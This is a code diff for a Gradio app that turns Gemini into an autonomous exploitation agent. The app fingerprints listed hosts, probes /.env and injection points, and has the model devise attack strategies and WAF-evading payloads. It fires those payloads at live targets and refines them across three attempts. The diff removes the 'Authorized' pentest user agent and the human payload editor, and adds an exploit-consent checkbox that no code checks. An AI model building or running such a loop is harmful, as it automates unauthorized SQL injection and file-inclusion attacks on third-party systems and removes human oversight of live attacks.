Update app.py

app.py

@@ -2,12 +2,13 @@ import asyncio
 import httpx
 import ssl
 import socket
+import re
 import csv
 import time
 import pandas as pd
 import gradio as gr
 from collections import defaultdict
-from typing import Dict, List, Tuple, Any
+from typing import Dict, List, Tuple, Any, Optional
 from pydantic import BaseModel, Field
 
 try:
@@ -18,59 +19,63 @@ except ImportError:
     GEMINI_AVAILABLE = False
 
 # ==============================================================================
-# SOTA DECISION ENGINE: CENTAUR FRAMEWORK (HUMAN-AI TEAMING)
+# SOTA COGNITIVE DECISION ENGINE: CLOSED-LOOP AUTONOMY
 # ==============================================================================
 
-MAX_CONCURRENT_RECON = 25
+MAX_CONCURRENT_RECON = 20
 SCAN_TIMEOUT = 5.0
 EXPLOIT_TIMEOUT = 8.0
 
 HTTP_HEADERS = {
-    "User-Agent": "Ethical-PenTest-WarRoom/6.0 (Authorized)",
+    "User-Agent": "Cognitive-PenTest-Agent/1.0",
     "Accept": "*/*",
     "X-Forwarded-For": "127.0.0.1",
 }
 
-# --- STRUCTURED OUTPUT SCHEMAS (GEMINI) ---
-class ExploitGeneration(BaseModel):
-    target_endpoint: str = Field(description="The path/parameter to attack (e.g., /api/users?id=).")
-    payload: str = Field(description="The exact PoC payload string.")
-    rationale: str = Field(description="Why this payload was chosen based on the target context.")
+# --- 1. AI STRUCTURED OUTPUT SCHEMAS ---
+
+class AttackStrategy(BaseModel):
+    vulnerability_class: str = Field(description="Class of vulnerability (e.g., SQLi, LFI, RCE).")
+    confidence: float = Field(description="Confidence score 0.0 to 1.0 based on recon evidence.")
+    strategy: str = Field(description="The approach (e.g., time_based_blind, path_traversal).")
+    target_endpoint: str = Field(description="The specific endpoint and parameter to target.")
+
+class PayloadGeneration(BaseModel):
+    technique: str = Field(description="Specific technique or encoding used.")
+    payload: str = Field(description="The exact payload string to inject.")
+    reasoning: str = Field(description="Why this payload fits the WAF and server profile.")
+
+class PayloadRefinement(BaseModel):
+    failure_analysis: str = Field(description="Analysis of why the previous payload failed based on the HTTP response diff and timing.")
+    adjusted_strategy: str = Field(description="How the approach changes (e.g., 'Switching to URL encoding').")
+    revised_payload: str = Field(description="The newly patched payload.")
 
 class ChatResponse(BaseModel):
-    chat_reply: str = Field(description="Message to display to the human operator.")
-    revised_endpoint: str = Field(description="The updated target endpoint.")
-    revised_payload: str = Field(description="The newly generated or revised payload.")
-
-# --- SIMULATED CVE CORRELATION GRAPH ---
-CVE_GRAPH = {
-    "nginx": {"behavior_match": [{"cve": "Misconfig-XXE", "type": "XXE Injection", "base_cvss": 8.0, "maturity": 0.9}]},
-    "apache": {"behavior_match": [{"cve": "Misconfig-LFI", "type": "Local File Inclusion", "base_cvss": 7.0, "maturity": 0.9}]},
-    "php": {"generic": [{"cve": "Generic-SQLi", "type": "SQL Injection", "base_cvss": 8.5, "maturity": 0.95}]},
-    "wordpress": {"generic": [{"cve": "WP-Plugin-RCE", "type": "RCE via Plugin", "base_cvss": 9.8, "maturity": 0.85}]},
-}
+    chat_reply: str = Field(description="Message to human operator.")
+    suggested_endpoint: str = Field(description="Updated endpoint.")
+    suggested_payload: str = Field(description="Revised payload.")
 
-# --- STATE MANAGEMENT CLASSES ---
-class HypothesisData:
-    def __init__(self, target_id: str, host: str, port: int, cve: str, attack_type: str, risk: float, context: dict):
-        self.target_id = target_id
-        self.host = host
-        self.port = port
-        self.cve = cve
-        self.attack_type = attack_type
-        self.risk = risk
-        self.context = context
-        self.ui_label = f"[{risk:.1f}] {target_id} -> {attack_type}"
-
-# --- RECON ENGINE ---
-class ReconEngine:
-    def __init__(self, host: str, port: int, logger: callable):
+# --- 2. SIGNAL-RICH RECON ENGINE ---
+
+class ReconProfile:
+    def __init__(self, host: str, port: int):
+        self.target_id = f"{host}:{port}"
         self.host = host
         self.port = port
-        self.logger = logger
         self.protocol = "http"
-        self.fingerprint = {"server": "", "xpb": "", "waf": "None", "cms": "None", "behaviors": []}
+        self.server_banner = "Unknown"
+        self.waf_detected = "None"
+        self.baseline_latency = 0.0
+        self.base_response_length = 0
+        
         self.discovered_paths = []
+        self.injection_sensitivity = [] # How it reacts to ' " ( ) ;
+        self.error_signatures = [] # Leaked stack traces
+
+class SensorReconEngine:
+    def __init__(self, profile: ReconProfile, logger: callable):
+        self.p = profile
+        self.logger = logger
         self.client = httpx.AsyncClient(verify=False, timeout=SCAN_TIMEOUT, headers=HTTP_HEADERS, follow_redirects=False)
 
     async def _detect_protocol(self):
@@ -78,66 +83,73 @@ class ReconEngine:
             conf = ssl.create_default_context()
             conf.check_hostname = False
             conf.verify_mode = ssl.CERT_NONE
-            reader, writer = await asyncio.wait_for(asyncio.open_connection(self.host, self.port, ssl=conf), timeout=1.5)
+            reader, writer = await asyncio.wait_for(asyncio.open_connection(self.p.host, self.p.port, ssl=conf), timeout=1.5)
             writer.close()
             await writer.wait_closed()
-            self.protocol = "https"
-            self.logger(f"🔒 {self.host}:{self.port} verified HTTPS")
+            self.p.protocol = "https"
         except:
-            self.protocol = "http"
+            self.p.protocol = "http"
 
-    def _url(self, path=""): return f"{self.protocol}://{self.host}:{self.port}{path}"
+    def _url(self, path=""): return f"{self.p.protocol}://{self.p.host}:{self.p.port}{path}"
 
-    async def _safe_req(self, method="GET", path="", timeout=SCAN_TIMEOUT):
-        try:
-            if method == "GET": return await self.client.get(self._url(path), timeout=timeout)
-        except Exception: return None
-
-    async def run_recon(self) -> List[HypothesisData]:
+    async def run(self):
         await self._detect_protocol()
         try:
-            # 1. Base Fingerprint
-            resp = await self._safe_req("GET", "/")
-            if resp:
-                srv = resp.headers.get("Server", "").lower()
-                self.fingerprint["server"] = srv
-                self.fingerprint["xpb"] = resp.headers.get("X-Powered-By", "Unknown").lower()
-                
-                # WAF & CMS Heuristics
-                if "cloudflare" in srv: self.fingerprint["waf"] = "Cloudflare"
-                if "imperva" in srv or "incap_ses" in str(resp.cookies): self.fingerprint["waf"] = "Imperva"
-                if "wp-content" in resp.text.lower(): self.fingerprint["cms"] = "wordpress"
-
-            # 2. Path Discovery (Concurrent)
-            paths = ["/admin", "/.env", "/api/v1/users", "/search", "/latest/meta-data/"]
-            tasks = [self._safe_req("GET", p) for p in paths]
-            results = await asyncio.gather(*tasks)
-            for path, res in zip(paths, results):
-                if res and res.status_code in [200, 301, 302, 401, 403]:
-                    self.discovered_paths.append(path)
-                    self.logger(f"📂 {self.host} -> Discovered: {path} ({res.status_code})")
-
-            return self.generate_hypotheses()
+            await self.profile_baseline()
+            await self.probe_injection_sensitivity()
+            await self.dynamic_path_expansion()
         finally:
             await self.client.aclose()
+        return self.p
+
+    async def profile_baseline(self):
+        """Measures baseline latency and response size, fingerprints server."""
+        start = time.time()
+        try:
+            resp = await self.client.get(self._url("/"))
+            self.p.baseline_latency = time.time() - start
+            self.p.base_response_length = len(resp.text)
+            
+            srv = resp.headers.get("Server", "").lower()
+            self.p.server_banner = srv
+            if "cloudflare" in srv: self.p.waf_detected = "Cloudflare"
+            if "imperva" in srv: self.p.waf_detected = "Imperva"
+            
+            self.logger(f"📊 Baseline [{self.p.target_id}]: Latency {self.p.baseline_latency:.2f}s | WAF: {self.p.waf_detected}")
+        except Exception: pass
 
-    def generate_hypotheses(self) -> List[HypothesisData]:
-        target_id = f"{self.host}:{self.port}"
-        techs = ["php"] # Generic fallback
-        if "nginx" in self.fingerprint["server"]: techs.append("nginx")
-        if "apache" in self.fingerprint["server"]: techs.append("apache")
-        if self.fingerprint["cms"] == "wordpress": techs.append("wordpress")
+    async def probe_injection_sensitivity(self):
+        """Sends neutral anomalies to see if the server leaks errors or sanitizes inputs."""
+        probes = [("?id=1'", "single_quote"), ("?q=\"><script>", "html_tags"), ("?file=../../", "traversal_chars")]
+        for path, tag in probes:
+            try:
+                resp = await self.client.get(self._url(path))
+                body = resp.text.lower()
+                # Check for error leaks
+                if any(err in body for err in ["sql syntax", "mysql_fetch", "stack trace", "java.lang"]):
+                    self.p.error_signatures.append(f"{tag}_leak")
+                    self.logger(f"🚨 Sensitivity Alert [{self.p.target_id}]: Error signature leaked on {tag}")
+                elif resp.status_code in [403, 406]:
+                    self.p.injection_sensitivity.append(f"{tag}_blocked")
+            except: pass
+
+    async def dynamic_path_expansion(self):
+        """If a base path exists, recursively check deeper."""
+        base_paths = ["/api", "/admin", "/.env"]
+        for bp in base_paths:
+            try:
+                resp = await self.client.get(self._url(bp))
+                if resp.status_code in [200, 401, 403, 301, 302]:
+                    self.p.discovered_paths.append(bp)
+                    self.logger(f"📂 Discovered Base Path: {bp}")
+                    # Dynamic Expansion
+                    if bp == "/api":
+                        exp_resp = await self.client.get(self._url("/api/v1/users"))
+                        if exp_resp.status_code == 200: self.p.discovered_paths.append("/api/v1/users")
+            except: pass
 
-        context = {"fingerprint": self.fingerprint, "paths": self.discovered_paths}
-        hyps = []
-        for tech in set(techs):
-            if tech in CVE_GRAPH:
-                for node in CVE_GRAPH[tech].get("behavior_match", []) + CVE_GRAPH[tech].get("generic", []):
-                    risk = (node["base_cvss"] * 0.4) + (node["maturity"] * 4.0) + 2.0
-                    hyps.append(HypothesisData(target_id, self.host, self.port, node["cve"], node["type"], risk, context))
-        return hyps
 
-# --- HTTP EXPLOIT FIRING ---
+# --- 3. THE AUTONOMOUS AGENT (EXPLOIT STATE MACHINE) ---
 
 async def fire_payload(protocol, host, port, endpoint, payload):
     url = f"{protocol}://{host}:{port}{endpoint}{payload}"
@@ -146,26 +158,129 @@ async def fire_payload(protocol, host, port, endpoint, payload):
         async with httpx.AsyncClient(verify=False, timeout=EXPLOIT_TIMEOUT) as client:
             resp = await client.get(url)
             latency = time.time() - start
-            
             success = False
-            if "root:x:0:0" in resp.text or "[extensions]" in resp.text or "aws_access_key" in resp.text.lower(): success = True
-            if latency > 4.5 and "SLEEP" in payload.upper(): success = True
+            # Universal Success Metrics
+            if "root:x:0:0" in resp.text or "[extensions]" in resp.text: success = True
+            if latency > (SCAN_TIMEOUT + 3.0) and "SLEEP" in payload.upper(): success = True
             
-            status = "SUCCESS 💥" if success else "Failed"
-            return success, status, resp.status_code, resp.text[:100].replace('\n', ' ')
+            return success, resp.status_code, latency, resp.text[:250].replace('\n', ' ')
+    except Exception as e:
+        return False, 0, time.time() - start, f"Connection Error: {str(e)}"
+
+async def autonomous_exploit_agent(profile: ReconProfile, api_key: str, logger: callable, update_ui_cb: callable):
+    """The Closed-Loop Reasoning Engine."""
+    if not api_key:
+        yield "🔴 Error", "No API Key", "Failed", "N/A"
+        return
+
+    llm = genai.Client(api_key=api_key)
+    
+    # AI Configuration with Google Search Grounding for current CVE research
+    config_strategy = types.GenerateContentConfig(
+        tools=[types.Tool(google_search=types.GoogleSearch())],
+        response_mime_type="application/json", 
+        response_json_schema=AttackStrategy.model_json_schema(),
+        temperature=0.2
+    )
+
+    recon_evidence = f"""
+    TARGET EVIDENCE PROFILE:
+    Target: {profile.target_id}
+    Server: {profile.server_banner}
+    WAF Detected: {profile.waf_detected}
+    Baseline Latency: {profile.baseline_latency:.3f}s
+    Error Leaks: {profile.error_signatures}
+    Blocked Injections: {profile.injection_sensitivity}
+    Discovered Paths: {profile.discovered_paths}
+    """
+
+    # STATE 1: STRATEGIZING
+    logger(f"🧠 [STRATEGIZING] Researching & Classifying {profile.target_id}")
+    await update_ui_cb("🧠 STRATEGIZING", "Researching via Google Search & building Attack Strategy...")
+    
+    try:
+        strat_resp = await llm.aio.models.generate_content(
+            model="gemini-2.5-flash",
+            contents=recon_evidence + "\nUse Google Search to find CVEs/bypasses for this server/WAF. Then formulate an AttackStrategy.",
+            config=config_strategy
+        )
+        strategy = AttackStrategy.model_validate_json(strat_resp.text)
     except Exception as e:
-        return False, "Error ⚠️", 0, str(e)
+        logger(f"⚠️ Strategy Gen Failed: {e}")
+        return
+
+    # STATE 2: PAYLOAD GENERATION
+    logger(f"⚙️ [GENERATING] Creating payload for {strategy.vulnerability_class}")
+    await update_ui_cb("⚙️ GENERATING", f"Crafting {strategy.strategy} payload...")
+    
+    config_gen = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema(), temperature=0.3)
+    try:
+        gen_resp = await llm.aio.models.generate_content(
+            model="gemini-2.5-flash",
+            contents=f"Strategy: {strategy.model_dump_json()}\nRecon: {recon_evidence}\nGenerate the specific payload.",
+            config=config_gen
+        )
+        gen = PayloadGeneration.model_validate_json(gen_resp.text)
+        current_endpoint, current_payload = strategy.target_endpoint, gen.payload
+    except Exception as e:
+         logger(f"⚠️ Payload Gen Failed: {e}"); return
+
+    # THE EXECUTION & REFINEMENT LOOP
+    for attempt in range(1, 4):
+        # STATE 3: EXPLOITING
+        logger(f"⚔️ [EXPLOITING] Attempt {attempt} on {current_endpoint}")
+        await update_ui_cb(f"⚔️ EXPLOITING (Try {attempt}/3)", f"Firing: {current_payload}")
+        
+        success, status, latency, snippet = await fire_payload(profile.protocol, profile.host, profile.port, current_endpoint, current_payload)
+        
+        # STATE 4: ANALYZING
+        await update_ui_cb("📊 ANALYZING FEEDBACK", f"Status: {status} | Latency: {latency:.2f}s | Diff checking...")
+        
+        if success:
+            logger(f"💥 [SUCCESS] Exploit triggered on {profile.target_id}!")
+            yield current_endpoint, current_payload, "SUCCESS 💥", f"Confirmed {strategy.vulnerability_class}. Latency: {latency:.2f}s"
+            return
+            
+        if attempt == 3: break
+
+        # STATE 5: REFINING
+        logger(f"🔧 [REFINING] Payload failed. Asking AI to patch...")
+        await update_ui_cb("🔧 REFINING", "Analyzing failure diff and rewriting payload...")
+        
+        feedback = f"""
+        PREVIOUS PAYLOAD: {current_payload}
+        OUTCOME: Failed.
+        FEEDBACK METRICS:
+        - HTTP Status: {status}
+        - Latency: {latency:.2f}s (Baseline was {profile.baseline_latency:.2f}s)
+        - Response Snippet: {snippet}
+        
+        Analyze the failure and provide a PayloadRefinement.
+        """
+        config_patch = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadRefinement.model_json_schema(), temperature=0.4)
+        try:
+            patch_resp = await llm.aio.models.generate_content(
+                model="gemini-2.5-flash", contents=feedback, config=config_patch
+            )
+            patch = PayloadRefinement.model_validate_json(patch_resp.text)
+            current_payload = patch.revised_payload
+            logger(f"💡 AI Insight: {patch.failure_analysis}")
+        except Exception:
+            pass # Fallback to loop if API drops
+
+    logger(f"🛑 [ABORT] Exhausted attempts on {profile.target_id}")
+    yield current_endpoint, current_payload, "FAILED", f"Analyzed 3 variations. WAF/Server resilient."
 
-# --- ASYNC GENERATORS & WORKFLOWS ---
 
-def parse_inputs(files, manual) -> List[Tuple[str, int]]:
+# --- UI ASYNC WRAPPERS & UTILS ---
+
+def parse_inputs(files, manual):
     targets = []
     if files:
         if not isinstance(files, list): files = [files]
         for f in files:
             try:
-                path = f.name if hasattr(f, 'name') else f
-                with open(path, 'r') as csvf:
+                with open(f.name if hasattr(f, 'name') else f, 'r') as csvf:
                     for row in csv.reader(csvf):
                         if row: targets.append((row[0].strip(), int(row[1]) if len(row)>1 and row[1].isdigit() else 80))
             except: pass
@@ -179,230 +294,133 @@ def parse_inputs(files, manual) -> List[Tuple[str, int]]:
                 targets.append((line, 80))
     return list(set(targets))
 
-async def background_recon_generator(files, manual, engine_state):
-    """Yields results incrementally so the user can use the War Room while it scans."""
+async def run_recon_phase(files, manual, state):
     log_queue = asyncio.Queue()
     def logger(msg): log_queue.put_nowait(msg)
     log_text = ""
-
     targets = parse_inputs(files, manual)
+    
     if not targets:
-        yield engine_state, gr.update(), "🔴 No targets provided.", log_text
+        yield state, gr.update(), "🔴 No targets provided.", log_text
         return
 
-    logger(f"🚀 Starting Background Recon on {len(targets)} targets.")
+    logger(f"🚀 [STAGE 1] Sensor Recon initiated on {len(targets)} targets.")
+    state["profiles"] = {}
     
-    # Reset State
-    engine_state["hypotheses"] = {}
-    engine_state["arsenal"] = defaultdict(list) # target_label -> list of dicts
-
-    semaphore = asyncio.Semaphore(MAX_CONCURRENT_RECON)
-    
-    async def process_target(h, p):
-        async with semaphore:
-            return await ReconEngine(h, p, logger).run_recon()
-
-    tasks = [asyncio.create_task(process_target(h, p)) for h, p in targets]
+    async def run_sensor(h, p):
+        profile = ReconProfile(h, p)
+        return await SensorReconEngine(profile, logger).run()
 
-    # Process as they complete
+    tasks = [asyncio.create_task(run_sensor(h, p)) for h, p in targets]
     for coro in asyncio.as_completed(tasks):
         try:
-            new_hyps = await coro
-            for hyp in new_hyps:
-                engine_state["hypotheses"][hyp.ui_label] = hyp
+            profile = await coro
+            state["profiles"][profile.target_id] = profile
         except Exception: pass
         
-        # Flush logs & Update UI incrementally!
-        while not log_queue.empty():
-            log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
+        while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
         log_text = '\n'.join(log_text.split('\n')[:100])
+        choices = list(state["profiles"].keys())
+        yield state, gr.update(choices=choices), f"🟡 **Scanning:** Extracted {len(choices)} target profiles...", log_text
 
-        choices = sorted(list(engine_state["hypotheses"].keys()), key=lambda x: float(re.search(r'\[(.*?)\]', x).group(1)), reverse=True)
-        yield engine_state, gr.update(choices=choices), f"🟡 **Scanning...** ({len(choices)} hypotheses found)", log_text
-
-    logger("✅ Background Recon Complete.")
     while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
-    
-    yield engine_state, gr.update(choices=choices), f"🟢 **Recon Complete!** Move to the War Room.", log_text
+    logger("✅ [STAGE 1] Recon Complete.")
+    yield state, gr.update(choices=list(state["profiles"].keys()), value=list(state["profiles"].keys())[0] if state["profiles"] else None), "🟢 **Recon Complete!** Move to the War Room.", log_text
 
-async def ai_payload_generator(target_label, endpoint, payload, instruction, api_key, engine_state):
-    """Uses Gemini to generate or revise a payload based on instructions/context."""
-    if not api_key: return "🔴 API Key Required", endpoint, payload, engine_state
-    if not target_label: return "🔴 Target Required", endpoint, payload, engine_state
-    
-    hyp = engine_state["hypotheses"][target_label]
-    llm = genai.Client(api_key=api_key)
+async def run_exploit_phase(target_id, api_key, state):
+    log_queue = asyncio.Queue()
+    def logger(msg): log_queue.put_nowait(msg)
+    log_text = ""
     
-    sys_ctx = f"""Target: {hyp.target_id} | WAF: {hyp.context['fingerprint']['waf']} | Paths: {hyp.context['paths']}
-    Goal: {hyp.attack_type}. Current Endpoint: '{endpoint}'. Current Payload: '{payload}'"""
-
-    try:
-        if not instruction: # Initial Auto-Generate
-            prompt = sys_ctx + "\nGenerate the initial exact payload."
-            schema = ExploitGeneration.model_json_schema()
-        else: # Revisions from Chat
-            prompt = sys_ctx + f"\nUser Instruction: {instruction}\nRevise the payload and endpoint accordingly."
-            schema = ChatResponse.model_json_schema()
-
-        resp = await llm.aio.models.generate_content(
-            model="gemini-2.5-flash", contents=prompt,
-            config={"response_mime_type": "application/json", "response_json_schema": schema}
-        )
-        
-        if not instruction:
-            plan = ExploitGeneration.model_validate_json(resp.text)
-            ep, pl = plan.target_endpoint, plan.payload
-            chat_reply = f"🤖 Generated initial payload. Rationale: {plan.rationale}"
-        else:
-            plan = ChatResponse.model_validate_json(resp.text)
-            ep, pl = plan.revised_endpoint, plan.revised_payload
-            chat_reply = f"🤖 {plan.chat_reply}"
-
-        # Add to Arsenal State
-        engine_state["arsenal"][target_label].append({"Endpoint": ep, "Payload": pl, "Status": "Pending", "Notes": "AI Generated"})
-        
-        return chat_reply, ep, pl, engine_state
-    except Exception as e:
-        return f"⚠️ API Error: {str(e)}", endpoint, payload, engine_state
+    if not api_key or not target_id:
+        yield "🔴 Error", "N/A", "N/A", "N/A", "N/A", log_text
+        return
 
-async def fire_manual(target_label, endpoint, payload, engine_state):
-    """Fires payload and logs it to the Arsenal DataFrame."""
-    if not target_label: return "🔴 No target", engine_state
-    hyp = engine_state["hypotheses"][target_label]
-    protocol = "https" if hyp.port == 443 else "http"
+    profile = state["profiles"][target_id]
     
-    success, status, code, snippet = await fire_payload(protocol, hyp.host, hyp.port, endpoint, payload)
+    # Callback to update the State Machine UI
+    ui_state = ""
+    ui_detail = ""
+    async def update_ui(s, d):
+        nonlocal ui_state, ui_detail
+        ui_state, ui_detail = s, d
+
+    agent_gen = autonomous_exploit_agent(profile, api_key, logger, update_ui)
     
-    # Update Arsenal
-    found = False
-    for item in engine_state["arsenal"][target_label]:
-        if item["Endpoint"] == endpoint and item["Payload"] == payload:
-            item["Status"] = status
-            item["Notes"] = f"HTTP {code}: {snippet}"
-            found = True
-            break
-    if not found:
-        engine_state["arsenal"][target_label].append({"Endpoint": endpoint, "Payload": payload, "Status": status, "Notes": f"HTTP {code}: {snippet}"})
+    # We must consume the agent loop while updating UI
+    ep, pl, res, det = "", "", "", ""
+    
+    # Polling loop to keep UI fresh
+    agent_task = asyncio.create_task(agent_gen.__anext__())
+    while not agent_task.done():
+        try:
+            msg = await asyncio.wait_for(log_queue.get(), timeout=0.2)
+            log_text = f"[{time.strftime('%X')}] {msg}\n" + log_text
+        except asyncio.TimeoutError: pass
+        
+        log_text = '\n'.join(log_text.split('\n')[:100])
+        yield ui_state, ui_detail, ep, pl, res, log_text
     
-    return f"**Result:** {status}\n**Code:** {code}\n**Snippet:** `{snippet}`", engine_state
-
-def render_arsenal(target_label, engine_state):
-    """Renders the DataFrame for the selected target."""
-    if not target_label or target_label not in engine_state.get("arsenal", {}):
-        return pd.DataFrame(columns=["Endpoint", "Payload", "Status", "Notes"])
-    df = pd.DataFrame(engine_state["arsenal"][target_label])
-    if df.empty: return pd.DataFrame(columns=["Endpoint", "Payload", "Status", "Notes"])
-    return df
-
-def load_payload_from_arsenal(evt: gr.SelectData, target_label, engine_state):
-    """When user clicks a row in the arsenal dataframe, load it into the editor."""
     try:
-        row = evt.index[0]
-        data = engine_state["arsenal"][target_label][row]
-        return data["Endpoint"], data["Payload"]
-    except:
-        return "", ""
+        ep, pl, res, det = agent_task.result()
+    except StopAsyncIteration: pass
+
+    while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
+    yield "✅ COMPLETE", det, ep, pl, res, log_text
+
 
 # ==============================================================================
-# GRADIO UI DEFINITION
+# GRADIO UI
 # ==============================================================================
 with gr.Blocks(theme=gr.themes.Monochrome()) as demo:
-    # State holds hypotheses and payload arsenal histories
-    engine_state = gr.State({"hypotheses": {}, "arsenal": defaultdict(list)})
+    engine_state = gr.State({"profiles": {}})
 
-    gr.Markdown("# 💀 Human-AI Teaming War Room (Centaur Framework)")
-    gr.Markdown("Recon runs in the background. You can switch to the War Room and exploit targets *while* the engine is still finding them.")
+    gr.Markdown("# 💀 SOTA Cognitive Exploitation Agent")
+    gr.Markdown("Features: **Signal-Rich Recon**, **Google Search Grounding**, and **Closed-Loop Reasoning (Strategize $\\rightarrow$ Exploit $\\rightarrow$ Refine)**.")
 
     with gr.Tabs():
         # --- TAB 1: RECON ---
-        with gr.Tab("1. Background Recon"):
+        with gr.Tab("1. Sensor Reconnaissance"):
             with gr.Row():
                 with gr.Column():
                     csv_in = gr.File(label="Upload CSV (Host, Port)", file_count="multiple")
                     txt_in = gr.Textbox(label="Manual Targets", lines=3, placeholder="192.168.1.1:80")
-                    recon_btn = gr.Button("🔍 START BACKGROUND RECON", variant="primary")
-                    api_key_in = gr.Textbox(label="Gemini API Key (For War Room)", type="password")
+                    recon_btn = gr.Button("🔍 START SENSOR RECON", variant="primary")
+                    api_key_in = gr.Textbox(label="Gemini API Key (Required for Agent)", type="password")
                 with gr.Column():
                     recon_status = gr.Markdown("System Offline.")
                     log_console = gr.Code(label="Live Recon Telemetry", language="shell", lines=15)
                     
         # --- TAB 2: WAR ROOM ---
-        with gr.Tab("2. War Room (Interactive Exploitation)"):
+        with gr.Tab("2. Agentic War Room"):
             with gr.Row():
-                # LEFT: TARGET & ARSENAL
                 with gr.Column(scale=1):
-                    target_dropdown = gr.Dropdown(label="Active Target Hypothesis", choices=[], interactive=True)
-                    
-                    gr.Markdown("### 🗄️ Payload Arsenal")
-                    gr.Markdown("*Click any row below to load the payload into the editor.*")
-                    arsenal_df = gr.Dataframe(headers=["Endpoint", "Payload", "Status", "Notes"], interactive=False, height=200)
+                    target_dropdown = gr.Dropdown(label="Extracted Target Profiles", choices=[], interactive=True)
+                    exploit_consent = gr.Checkbox(label="🚨 Authorize AI Agent (Execute live exploits)", value=False)
+                    fire_agent_btn = gr.Button("⚡ DEPLOY AUTONOMOUS AGENT", variant="primary")
                     
-                    gr.Markdown("### 🛠️ Manual Payload Editor")
-                    endpoint_in = gr.Textbox(label="Target Endpoint", placeholder="/api/users?id=")
-                    payload_in = gr.Textbox(label="PoC Payload", placeholder="' OR 1=1--")
-                    
-                    with gr.Row():
-                        fire_btn = gr.Button("🎯 FIRE PAYLOAD", variant="primary")
-                        ai_gen_btn = gr.Button("🤖 AUTO-GENERATE PAYLOAD")
-                    
-                    fire_result = gr.Markdown("Awaiting execution...")
+                    gr.Markdown("### ⚙️ Live Agent State Machine")
+                    state_box = gr.Textbox(label="Current Phase", value="IDLE", interactive=False)
+                    detail_box = gr.Textbox(label="Phase Details", value="Waiting for deployment...", interactive=False)
 
-                # RIGHT: AI CHAT
                 with gr.Column(scale=1):
-                    gr.Markdown("### 💬 Centaur Teaming Interface")
-                    chatbot = gr.Chatbot(label="Gemini Exploit Assistant", height=350)
-                    chat_in = gr.Textbox(label="Instruction (e.g. 'Encode in Base64')", placeholder="The WAF blocked the quote. Patch the payload in the editor.")
-                    chat_btn = gr.Button("Send Instruction to AI")
+                    gr.Markdown("### 💉 Live Payload Telemetry")
+                    ep_box = gr.Textbox(label="Target Endpoint", interactive=False)
+                    pl_box = gr.Textbox(label="Injected Payload", interactive=False)
+                    res_box = gr.Textbox(label="Final Result", interactive=False)
 
-    # --- EVENT WIRING ---
-    
-    # 1. Background Recon
+    # --- WIRING ---
     recon_btn.click(
-        fn=background_recon_generator,
+        fn=run_recon_phase,
         inputs=[csv_in, txt_in, engine_state],
-        outputs=[engine_state, target_dropdown, recon_status, log_console],
-        concurrency_limit=None # Allows other UI actions while yielding!
-    )
-
-    # 2. Update Arsenal when Target Changes
-    target_dropdown.change(
-        fn=render_arsenal, inputs=[target_dropdown, engine_state], outputs=[arsenal_df]
-    )
-
-    # 3. Load payload from Arsenal click
-    arsenal_df.select(
-        fn=load_payload_from_arsenal, inputs=[target_dropdown, engine_state], outputs=[endpoint_in, payload_in]
-    )
-
-    # 4. Fire Payload (Updates state, then re-renders Arsenal)
-    fire_btn.click(
-        fn=fire_manual, inputs=[target_dropdown, endpoint_in, payload_in, engine_state], outputs=[fire_result, engine_state]
-    ).then(
-        fn=render_arsenal, inputs=[target_dropdown, engine_state], outputs=[arsenal_df]
-    )
-
-    # 5. AI Initial Generate
-    ai_gen_btn.click(
-        fn=lambda tgt, ep, pl, api, st: asyncio.run(ai_payload_generator(tgt, ep, pl, "", api, st)),
-        inputs=[target_dropdown, endpoint_in, payload_in, api_key_in, engine_state],
-        outputs=[fire_result, endpoint_in, payload_in, engine_state]
-    ).then(
-        fn=render_arsenal, inputs=[target_dropdown, engine_state], outputs=[arsenal_df]
+        outputs=[engine_state, target_dropdown, recon_status, log_console]
     )
 
-    # 6. AI Chat Patching
-    def chat_wrapper(user_msg, history, tgt, ep, pl, api, st):
-        reply, new_ep, new_pl, new_st = asyncio.run(ai_payload_generator(tgt, ep, pl, user_msg, api, st))
-        history.append((user_msg, reply))
-        return history, new_ep, new_pl, new_st, "" # return "" to clear input
-
-    chat_btn.click(
-        fn=chat_wrapper,
-        inputs=[chat_in, chatbot, target_dropdown, endpoint_in, payload_in, api_key_in, engine_state],
-        outputs=[chatbot, endpoint_in, payload_in, engine_state, chat_in]
-    ).then(
-        fn=render_arsenal, inputs=[target_dropdown, engine_state], outputs=[arsenal_df]
+    fire_agent_btn.click(
+        fn=run_exploit_phase,
+        inputs=[target_dropdown, api_key_in, engine_state],
+        outputs=[state_box, detail_box, ep_box, pl_box, res_box, log_console]
     )
 
 if __name__ == "__main__":
-    demo.queue(default_concurrency_limit=20).launch()
+    demo.launch()